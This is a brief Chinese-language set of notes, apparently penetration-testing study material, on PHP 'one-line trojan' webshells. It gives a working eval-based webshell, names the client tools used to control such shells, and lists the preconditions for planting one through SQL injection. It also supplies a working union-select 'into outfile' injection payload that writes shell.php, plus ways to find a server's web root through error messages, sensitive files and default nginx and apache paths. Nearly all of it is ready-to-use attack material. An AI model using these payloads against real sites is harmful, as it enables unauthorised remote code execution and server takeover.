一句话木马
php类型的一句话木马: <?php @eval($_POST['123']);?>
一句话木马利用工具:菜刀,蚁剑,冰蝎,哥斯拉
用蚁剑连接一句话木马:
通过注入点写入木马程序的前提条件
1 mysql开启了secure_file_priv=""的配置
2 知道网站代码的真实物理路径
3 物理路径具备写入权限
通过注入点写入木马程序
在mysql中往磁盘写入文件:
select "hello word" into outfile "C:\\phpStudy\\WWW\\test.txt";
通过注入点写入webshell:
' union select "<?php @eval($_POST['123']);?>", 2 into outfile "C:\\phpStudy\\WWW\\shell.php"#
获取后台站点真实路径:
1 信息收集,收集站点敏感目录,敏感文件,如phpinfo.php
2 站点网址输入错误的网址路径或加一些非法参数,让其报错,报错信息中可能存在路径信息
3 指纹信息收集:
nginx默认站点根目录:/usr/share/nginx/html, 配置文件路径:/etc/nginx/nginx.conf
apache默认站点根目录:/var/www/html